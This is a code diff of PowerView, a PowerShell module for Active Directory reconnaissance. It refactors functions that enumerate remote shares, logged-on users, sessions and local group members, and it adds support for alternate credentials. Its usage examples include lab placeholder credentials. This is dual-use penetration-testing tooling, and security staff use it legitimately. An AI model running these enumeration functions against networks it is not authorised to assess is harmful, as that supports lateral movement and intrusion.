-                            $Group | Add-Member Noteproperty 'Description' ($_.Description[0])
-                            $Group.PSObject.TypeNames.Add('PowerView.LocalGroup')
-                            $Group
-                        }
+                    if ($Credential -ne [Management.Automation.PSCredential]::Empty) {
+                        $GroupProvider = New-Object DirectoryServices.DirectoryEntry("WinNT://$Computer/$GroupName,group", $Credential.UserName, $Credential.GetNetworkCredential().Password)
                     }
                     else {
-                        # otherwise we're listing the group members
-                        $Members = @($([ADSI]"WinNT://$Server/$GroupName,group").psbase.Invoke('Members'))
-
-                        $Members | ForEach-Object {
-
-                            $Member = New-Object PSObject
-                            $Member | Add-Member Noteproperty 'ComputerName' $Server
-
-                            $AdsPath = ($_.GetType().InvokeMember('Adspath', 'GetProperty', $Null, $_, $Null)).Replace('WinNT://', '')
-                            $Class = $_.GetType().InvokeMember('Class', 'GetProperty', $Null, $_, $Null)
-
-                            # try to translate the NT4 domain to a FQDN if possible
-                            $Name = Convert-ADName -ObjectName $AdsPath -InputType 'NT4' -OutputType 'Canonical'
-                            $IsGroup = $Class -eq "Group"
+                        $GroupProvider = [ADSI]"WinNT://$Computer/$GroupName,group"
+                    }
 
-                            if($Name) {
-                                $FQDN = $Name.split("/")[0]
-                                $ObjName = $AdsPath.split("/")[-1]
-                                $Name = "$FQDN/$ObjName"
-                                $IsDomain = $True
-                            }
-                            else {
-                                $ObjName = $AdsPath.split("/")[-1]
-                                $Name = $AdsPath
-                                $IsDomain = $False
-                            }
+                    $GroupProvider.psbase.Invoke('Members') | ForEach-Object {
 
-                            $Member | Add-Member Noteproperty 'AccountName' $Name
-                            $Member | Add-Member Noteproperty 'IsDomain' $IsDomain
-                            $Member | Add-Member Noteproperty 'IsGroup' $IsGroup
+                        $Member = New-Object PSObject
+                        $Member | Add-Member Noteproperty 'ComputerName' $Computer
+                        $Member | Add-Member Noteproperty 'GroupName' $GroupName
 
-                            if($IsDomain) {
-                                # translate the binary sid to a string
-                                $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($_.GetType().InvokeMember('ObjectSID', 'GetProperty', $Null, $_, $Null),0)).Value)
-                                $Member | Add-Member Noteproperty 'Description' ""
-                                $Member | Add-Member Noteproperty 'Disabled' ""
+                        $LocalUser = ([ADSI]$_)
+                        $AdsPath = $LocalUser.InvokeGet('AdsPath').Replace('WinNT://', '')
+                        $IsGroup = ($LocalUser.SchemaClassName -like 'group')
 
-                                if($IsGroup) {
-                                    $Member | Add-Member Noteproperty 'LastLogin' ""
-                                }
-                                else {
-                                    try {
-                                        $Member | Add-Member Noteproperty 'LastLogin' ( $_.GetType().InvokeMember('LastLogin', 'GetProperty', $Null, $_, $Null))
-                                    }
-                                    catch {
-                                        $Member | Add-Member Noteproperty 'LastLogin' ""
-                                    }
-                                }
-                                $Member | Add-Member Noteproperty 'PwdLastSet' ""
-                                $Member | Add-Member Noteproperty 'PwdExpired' ""
-                                $Member | Add-Member Noteproperty 'UserFlags' ""
-                            }
-                            else {
-                                # repull this user object so we can ensure correct information
-                                $LocalUser = $([ADSI] "WinNT://$AdsPath")
-
-                                # translate the binary sid to a string
-                                $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.objectSid.value,0)).Value)
-                                $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description[0])
-
-                                if($IsGroup) {
-                                    $Member | Add-Member Noteproperty 'PwdLastSet' ""
-                                    $Member | Add-Member Noteproperty 'PwdExpired' ""
-                                    $Member | Add-Member Noteproperty 'UserFlags' ""
-                                    $Member | Add-Member Noteproperty 'Disabled' ""
-                                    $Member | Add-Member Noteproperty 'LastLogin' ""
-                                }
-                                else {
-                                    $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0]))
-                                    $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1')
-                                    $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] )
-                                    # UAC flags of 0x2 mean the account is disabled
-                                    $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.userFlags.value -band 2) -eq 2)
-                                    try {
-                                        $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0])
-                                    }
-                                    catch {
-                                        $Member | Add-Member Noteproperty 'LastLogin' ""
-                                    }
-                                }
-                            }
-                            $Member.PSObject.TypeNames.Add('PowerView.LocalUser')
-                            $Member
-
-                            # if the result is a group domain object and we're recursing,
-                            #   try to resolve all the group member results
-                            if($Recurse -and $IsGroup) {
-                                if($IsDomain) {
-                                  $FQDN = $Name.split("/")[0]
-                                  $GroupName = $Name.split("/")[1].trim()
-
-                                  Get-NetGroupMember -GroupName $GroupName -Domain $FQDN -FullData -Recurse | ForEach-Object {
-
-                                      $Member = New-Object PSObject
-                                      $Member | Add-Member Noteproperty 'ComputerName' "$FQDN/$($_.GroupName)"
-
-                                      $MemberDN = $_.distinguishedName
-                                      # extract the FQDN from the Distinguished Name
-                                      $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
-
-                                      $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype
-
-                                      if ($_.samAccountName) {
-                                          # forest users have the samAccountName set
-                                          $MemberName = $_.samAccountName
-                                      }
-                                      else {
-                                          try {
-                                              # external trust users have a SID, so convert it
-                                              try {
-                                                  $MemberName = Convert-SidToName $_.cn
-                                              }
-                                              catch {
-                                                  # if there's a problem contacting the domain to resolve the SID
-                                                  $MemberName = $_.cn
-                                              }
-                                          }
-                                          catch {
-                                              Write-Debug "Error resolving SID : $_"
-                                          }
-                                      }
-
-                                      $Member | Add-Member Noteproperty 'AccountName' "$MemberDomain/$MemberName"
-                                      $Member | Add-Member Noteproperty 'SID' $_.objectsid
-                                      $Member | Add-Member Noteproperty 'Description' $_.description
-                                      $Member | Add-Member Noteproperty 'Disabled' $False
-                                      $Member | Add-Member Noteproperty 'IsGroup' $MemberIsGroup
-                                      $Member | Add-Member Noteproperty 'IsDomain' $True
-                                      $Member | Add-Member Noteproperty 'LastLogin' ''
-                                      $Member | Add-Member Noteproperty 'PwdLastSet' $_.pwdLastSet
-                                      $Member | Add-Member Noteproperty 'PwdExpired' ''
-                                      $Member | Add-Member Noteproperty 'UserFlags' $_.userAccountControl
-                                      $Member.PSObject.TypeNames.Add('PowerView.LocalUser')
-                                      $Member
-                                  }
-                              } else {
-                                Get-NetLocalGroup -ComputerName $Server -GroupName $ObjName -Recurse
-                              }
-                            }
+                        if(([regex]::Matches($AdsPath, '/')).count -eq 1) {
+                            # DOMAIN\user
+                            $MemberIsDomain = $True
+                            $Name = $AdsPath.Replace('/', '\')
+                        }
+                        else {
+                            # DOMAIN\machine\user
+                            $MemberIsDomain = $False
+                            $Name = $AdsPath.Substring($AdsPath.IndexOf('/')+1).Replace('/', '\')
                         }
+
+                        $Member | Add-Member Noteproperty 'AccountName' $Name
+                        $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)
+                        $Member | Add-Member Noteproperty 'IsGroup' $IsGroup
+                        $Member | Add-Member Noteproperty 'IsDomain' $MemberIsDomain
+
+                        # if ($MemberIsDomain) {
+                        #     # translate the binary sid to a string
+                        #     $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)
+                        #     $Member | Add-Member Noteproperty 'Description' ''
+                        #     $Member | Add-Member Noteproperty 'Disabled' ''
+
+                        #     if ($IsGroup) {
+                        #         $Member | Add-Member Noteproperty 'LastLogin' ''
+                        #     }
+                        #     else {
+                        #         try {
+                        #             $Member | Add-Member Noteproperty 'LastLogin' $LocalUser.InvokeGet('LastLogin')
+                        #         }
+                        #         catch {
+                        #             $Member | Add-Member Noteproperty 'LastLogin' ''
+                        #         }
+                        #     }
+                        #     $Member | Add-Member Noteproperty 'PwdLastSet' ''
+                        #     $Member | Add-Member Noteproperty 'PwdExpired' ''
+                        #     $Member | Add-Member Noteproperty 'UserFlags' ''
+                        # }
+                        # else {
+                        #     # translate the binary sid to a string
+                        #     $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value)
+                        #     $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description)
+
+                        #     if ($IsGroup) {
+                        #         $Member | Add-Member Noteproperty 'PwdLastSet' ''
+                        #         $Member | Add-Member Noteproperty 'PwdExpired' ''
+                        #         $Member | Add-Member Noteproperty 'UserFlags' ''
+                        #         $Member | Add-Member Noteproperty 'Disabled' ''
+                        #         $Member | Add-Member Noteproperty 'LastLogin' ''
+                        #     }
+                        #     else {
+                        #         $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0]))
+                        #         $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1')
+                        #         $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] )
+                        #         # UAC flags of 0x2 mean the account is disabled
+                        #         $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.UserFlags.value -band 2) -eq 2)
+                        #         try {
+                        #             $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0])
+                        #         }
+                        #         catch {
+                        #             $Member | Add-Member Noteproperty 'LastLogin' ''
+                        #         }
+                        #     }
+                        # }
+
+                        $Member
                     }
                 }
                 catch {
-                    Write-Warning "[!] Error: $_"
+                    Write-Verbose "[Get-NetLocalGroupMember] Error for $Computer : $_"
                 }
             }
         }
     }
 }
 
-filter Get-NetShare {
+
+function Get-NetShare {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        This function will execute the NetShareEnum Win32API call to query
-        a given host for open shares. This is a replacement for
-        "net share \\hostname"
+Returns open shares on the local (or a remote) machine.
 
-    .PARAMETER ComputerName
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  
 
-        The hostname to query for shares. Also accepts IP addresses.
+.DESCRIPTION
 
-    .OUTPUTS
+This function will execute the NetShareEnum Win32API call to query
+a given host for open shares. This is a replacement for "net share \\hostname".
 
-        SHARE_INFO_1 structure. A representation of the SHARE_INFO_1
-        result structure which includes the name and note for each share,
-        with the ComputerName added.
+.PARAMETER ComputerName
 
-    .EXAMPLE
+Specifies the hostname to query for shares (also accepts IP addresses).
+Defaults to 'localhost'.
 
-        PS C:\> Get-NetShare
+.PARAMETER Credential
 
-        Returns active shares on the local host.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetShare -ComputerName sqlserver
+Get-NetShare
 
-        Returns active shares on the 'sqlserver' host
+Returns active shares on the local host.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetComputer | Get-NetShare
+Get-NetShare -ComputerName sqlserver
 
-        Returns all shares for all computers in the domain.
+Returns active shares on the 'sqlserver' host
 
-    .LINK
+.EXAMPLE
 
-        http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
-#>
+Get-DomainComputer | Get-NetShare
 
-    [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
-        [ValidateNotNullOrEmpty()]
-        $ComputerName = 'localhost'
-    )
+Returns all shares for all computers in the domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetShare -ComputerName sqlserver -Credential $Cred
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
+.OUTPUTS
 
-    # arguments for NetShareEnum
-    $QueryLevel = 1
-    $PtrInfo = [IntPtr]::Zero
-    $EntriesRead = 0
-    $TotalRead = 0
-    $ResumeHandle = 0
+PowerView.ShareInfo
 
-    # get the share information
-    $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+A PSCustomObject representing a SHARE_INFO_1 structure, including
+the name/type/remark for each share, with the ComputerName added.
 
-    # Locate the offset of the initial intPtr
-    $Offset = $PtrInfo.ToInt64()
+.LINK
 
-    # 0 = success
-    if (($Result -eq 0) -and ($Offset -gt 0)) {
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
+#>
 
-        # Work out how much to increment the pointer by finding out the size of the structure
-        $Increment = $SHARE_INFO_1::GetSize()
+    [OutputType('PowerView.ShareInfo')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ComputerName = 'localhost',
 
-        # parse all the result structures
-        for ($i = 0; ($i -lt $EntriesRead); $i++) {
-            # create a new int ptr at the given offset and cast the pointer as our result structure
-            $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
-            $Info = $NewIntPtr -as $SHARE_INFO_1
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
 
-            # return all the sections of the structure
-            $Shares = $Info | Select-Object *
-            $Shares | Add-Member Noteproperty 'ComputerName' $Computer
-            $Offset = $NewIntPtr.ToInt64()
-            $Offset += $Increment
-            $Shares
+    BEGIN {
+        if ($PSBoundParameters['Credential']) {
+            $LogonToken = Invoke-UserImpersonation -Credential $Credential
         }
+    }
 
-        # free up the result buffer
-        $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            # arguments for NetShareEnum
+            $QueryLevel = 1
+            $PtrInfo = [IntPtr]::Zero
+            $EntriesRead = 0
+            $TotalRead = 0
+            $ResumeHandle = 0
+
+            # get the raw share information
+            $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+
+            # locate the offset of the initial intPtr
+            $Offset = $PtrInfo.ToInt64()
+
+            # 0 = success
+            if (($Result -eq 0) -and ($Offset -gt 0)) {
+
+                # work out how much to increment the pointer by finding out the size of the structure
+                $Increment = $SHARE_INFO_1::GetSize()
+
+                # parse all the result structures
+                for ($i = 0; ($i -lt $EntriesRead); $i++) {
+                    # create a new int ptr at the given offset and cast the pointer as our result structure
+                    $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+                    $Info = $NewIntPtr -as $SHARE_INFO_1
+
+                    # return all the sections of the structure - have to do it this way for V2
+                    $Share = $Info | Select-Object *
+                    $Share | Add-Member Noteproperty 'ComputerName' $Computer
+                    $Share.PSObject.TypeNames.Insert(0, 'PowerView.ShareInfo')
+                    $Offset = $NewIntPtr.ToInt64()
+                    $Offset += $Increment
+                    $Share
+                }
+
+                # free up the result buffer
+                $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+            }
+            else {
+                Write-Verbose "[Get-NetShare] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+            }
+        }
     }
-    else {
-        Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
     }
 }
 
 
-filter Get-NetLoggedon {
+function Get-NetLoggedon {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        This function will execute the NetWkstaUserEnum Win32API call to query
-        a given host for actively logged on users.
+Returns users logged on the local (or a remote) machine.
+Note: administrative rights needed for newer Windows OSes.
 
-    .PARAMETER ComputerName
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  
 
-        The hostname to query for logged on users.
+.DESCRIPTION
 
-    .OUTPUTS
+This function will execute the NetWkstaUserEnum Win32API call to query
+a given host for actively logged on users.
 
-        WKSTA_USER_INFO_1 structure. A representation of the WKSTA_USER_INFO_1
-        result structure which includes the username and domain of logged on users,
-        with the ComputerName added.
+.PARAMETER ComputerName
 
-    .EXAMPLE
+Specifies the hostname to query for logged on users (also accepts IP addresses).
+Defaults to 'localhost'.
 
-        PS C:\> Get-NetLoggedon
+.PARAMETER Credential
 
-        Returns users actively logged onto the local host.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetLoggedon -ComputerName sqlserver
+Get-NetLoggedon
 
-        Returns users actively logged onto the 'sqlserver' host.
+Returns users actively logged onto the local host.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetComputer | Get-NetLoggedon
+Get-NetLoggedon -ComputerName sqlserver
 
-        Returns all logged on userse for all computers in the domain.
+Returns users actively logged onto the 'sqlserver' host.
 
-    .LINK
+.EXAMPLE
 
-        http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
-#>
+Get-DomainComputer | Get-NetLoggedon
 
-    [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
-        [ValidateNotNullOrEmpty()]
-        $ComputerName = 'localhost'
-    )
+Returns all logged on users for all computers in the domain.
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
+.EXAMPLE
 
-    # Declare the reference variables
-    $QueryLevel = 1
-    $PtrInfo = [IntPtr]::Zero
-    $EntriesRead = 0
-    $TotalRead = 0
-    $ResumeHandle = 0
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetLoggedon -ComputerName sqlserver -Credential $Cred
 
-    # get logged on user information
-    $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+.OUTPUTS
 
-    # Locate the offset of the initial intPtr
-    $Offset = $PtrInfo.ToInt64()
+PowerView.LoggedOnUserInfo
 
-    # 0 = success
-    if (($Result -eq 0) -and ($Offset -gt 0)) {
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.
 
-        # Work out how much to increment the pointer by finding out the size of the structure
-        $Increment = $WKSTA_USER_INFO_1::GetSize()
+.LINK
 
-        # parse all the result structures
-        for ($i = 0; ($i -lt $EntriesRead); $i++) {
-            # create a new int ptr at the given offset and cast the pointer as our result structure
-            $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
-            $Info = $NewIntPtr -as $WKSTA_USER_INFO_1
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
+#>
 
-            # return all the sections of the structure
-            $LoggedOn = $Info | Select-Object *
-            $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
-            $Offset = $NewIntPtr.ToInt64()
-            $Offset += $Increment
-            $LoggedOn
+    [OutputType('PowerView.LoggedOnUserInfo')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ComputerName = 'localhost',
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    BEGIN {
+        if ($PSBoundParameters['Credential']) {
+            $LogonToken = Invoke-UserImpersonation -Credential $Credential
         }
+    }
 
-        # free up the result buffer
-        $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            # declare the reference variables
+            $QueryLevel = 1
+            $PtrInfo = [IntPtr]::Zero
+            $EntriesRead = 0
+            $TotalRead = 0
+            $ResumeHandle = 0
+
+            # get logged on user information
+            $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+
+            # locate the offset of the initial intPtr
+            $Offset = $PtrInfo.ToInt64()
+
+            # 0 = success
+            if (($Result -eq 0) -and ($Offset -gt 0)) {
+
+                # work out how much to increment the pointer by finding out the size of the structure
+                $Increment = $WKSTA_USER_INFO_1::GetSize()
+
+                # parse all the result structures
+                for ($i = 0; ($i -lt $EntriesRead); $i++) {
+                    # create a new int ptr at the given offset and cast the pointer as our result structure
+                    $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+                    $Info = $NewIntPtr -as $WKSTA_USER_INFO_1
+
+                    # return all the sections of the structure - have to do it this way for V2
+                    $LoggedOn = $Info | Select-Object *
+                    $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
+                    $LoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LoggedOnUserInfo')
+                    $Offset = $NewIntPtr.ToInt64()
+                    $Offset += $Increment
+                    $LoggedOn
+                }
+
+                # free up the result buffer
+                $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+            }
+            else {
+                Write-Verbose "[Get-NetLoggedon] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+            }
+        }
     }
-    else {
-        Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
     }
 }
 
 
-filter Get-NetSession {
+function Get-NetSession {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns session information for the local (or a remote) machine.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf  
+
+.DESCRIPTION
+
+This function will execute the NetSessionEnum Win32API call to query
+a given host for active sessions.
+
+.PARAMETER ComputerName
 
-        This function will execute the NetSessionEnum Win32API call to query
-        a given host for active sessions on the host.
-        Heavily adapted from dunedinite's post on stackoverflow (see LINK below)
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to 'localhost'.
 
-    .PARAMETER ComputerName
+.PARAMETER Credential
 
-        The ComputerName to query for active sessions.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
 
-    .PARAMETER UserName
+.EXAMPLE
 
-        The user name to filter for active sessions.
+Get-NetSession
 
-    .OUTPUTS
+Returns active sessions on the local host.
 
-        SESSION_INFO_10 structure. A representation of the SESSION_INFO_10
-        result structure which includes the host and username associated
-        with active sessions, with the ComputerName added.
+.EXAMPLE
 
-    .EXAMPLE
+Get-NetSession -ComputerName sqlserver
 
-        PS C:\> Get-NetSession
+Returns active sessions on the 'sqlserver' host.
 
-        Returns active sessions on the local host.
+.EXAMPLE
 
-    .EXAMPLE
+Get-DomainController | Get-NetSession
 
-        PS C:\> Get-NetSession -ComputerName sqlserver
+Returns active sessions on all domain controllers.
 
-        Returns active sessions on the 'sqlserver' host.
+.EXAMPLE
 
-    .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetSession -ComputerName sqlserver -Credential $Cred
 
-        PS C:\> Get-NetDomainController | Get-NetSession
+.OUTPUTS
 
-        Returns active sessions on all domain controllers.
+PowerView.SessionInfo
 
-    .LINK
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the CName/UserName/Time/IdleTime for each session, with the ComputerName added.
 
-        http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
+.LINK
+
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
 #>
 
+    [OutputType('PowerView.SessionInfo')]
     [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
         [ValidateNotNullOrEmpty()]
+        [String[]]
         $ComputerName = 'localhost',
 
-        [String]
-        $UserName = ''
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
-
-    # arguments for NetSessionEnum
-    $QueryLevel = 10
-    $PtrInfo = [IntPtr]::Zero
-    $EntriesRead = 0
-    $TotalRead = 0
-    $ResumeHandle = 0
-
-    # get session information
-    $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
-
-    # Locate the offset of the initial intPtr
-    $Offset = $PtrInfo.ToInt64()
+    BEGIN {
+        if ($PSBoundParameters['Credential']) {
+            $LogonToken = Invoke-UserImpersonation -Credential $Credential
+        }
+    }
 
-    # 0 = success
-    if (($Result -eq 0) -and ($Offset -gt 0)) {
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            # arguments for NetSessionEnum
+            $QueryLevel = 10
+            $PtrInfo = [IntPtr]::Zero
+            $EntriesRead = 0
+            $TotalRead = 0
+            $ResumeHandle = 0
+
+            # get session information
+            $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+
+            # locate the offset of the initial intPtr
+            $Offset = $PtrInfo.ToInt64()
+
+            # 0 = success
+            if (($Result -eq 0) -and ($Offset -gt 0)) {
+
+                # work out how much to increment the pointer by finding out the size of the structure
+                $Increment = $SESSION_INFO_10::GetSize()
+
+                # parse all the result structures
+                for ($i = 0; ($i -lt $EntriesRead); $i++) {
+                    # create a new int ptr at the given offset and cast the pointer as our result structure
+                    $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+                    $Info = $NewIntPtr -as $SESSION_INFO_10
+
+                    # return all the sections of the structure - have to do it this way for V2
+                    $Session = $Info | Select-Object *
+                    $Session | Add-Member Noteproperty 'ComputerName' $Computer
+                    $Session.PSObject.TypeNames.Insert(0, 'PowerView.SessionInfo')
+                    $Offset = $NewIntPtr.ToInt64()
+                    $Offset += $Increment
+                    $Session
+                }
 
-        # Work out how much to increment the pointer by finding out the size of the structure
-        $Increment = $SESSION_INFO_10::GetSize()
+                # free up the result buffer
+                $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+            }
+            else {
+                Write-Verbose "[Get-NetSession] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+            }
+        }
+    }
 
-        # parse all the result structures
-        for ($i = 0; ($i -lt $EntriesRead); $i++) {
-            # create a new int ptr at the given offset and cast the pointer as our result structure
-            $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
-            $Info = $NewIntPtr -as $SESSION_INFO_10
 
-            # return all the sections of the structure
-            $Sessions = $Info | Select-Object *
-            $Sessions | Add-Member Noteproperty 'ComputerName' $Computer
-            $Offset = $NewIntPtr.ToInt64()
-            $Offset += $Increment
-            $Sessions
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
         }
-        # free up the result buffer
-        $Null = $Netapi32::NetApiBufferFree($PtrInfo)
-    }
-    else {
-        Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
     }
 }
 
 
-filter Get-LoggedOnLocal {
+function Get-RegLoggedOn {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns who is logged onto the local (or a remote) machine
+through enumeration of remote registry keys.
+
+Note: This function requires only domain user rights on the
+machine you're enumerating, but remote registry must be enabled.
+
+Author: Matt Kelly (@BreakersAll)  
+License: BSD 3-Clause  
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID  
+
+.DESCRIPTION
+
+This function will query the HKU registry values to retrieve the local
+logged on users SID and then attempt and reverse it.
+Adapted technique from Sysinternal's PSLoggedOn script. Benefit over
+using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
+required (NetWkstaUserEnum requires remote admin access).
 
-        This function will query the HKU registry values to retrieve the local
-        logged on users SID and then attempt and reverse it.
-        Adapted technique from Sysinternal's PSLoggedOn script. Benefit over
-        using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
-        required (NetWkstaUserEnum requires remote admin access).
+.PARAMETER ComputerName
 
-        Note: This function requires only domain user rights on the
-        machine you're enumerating, but remote registry must be enabled.
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
 
-        Function: Get-LoggedOnLocal
-        Author: Matt Kelly, @BreakersAll
+.PARAMETER Credential
 
-    .PARAMETER ComputerName
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
 
-        The ComputerName to query for active sessions.
+.EXAMPLE
 
-    .EXAMPLE
+Get-RegLoggedOn
 
-        PS C:\> Get-LoggedOnLocal
+Returns users actively logged onto the local host.
 
-        Returns active sessions on the local host.
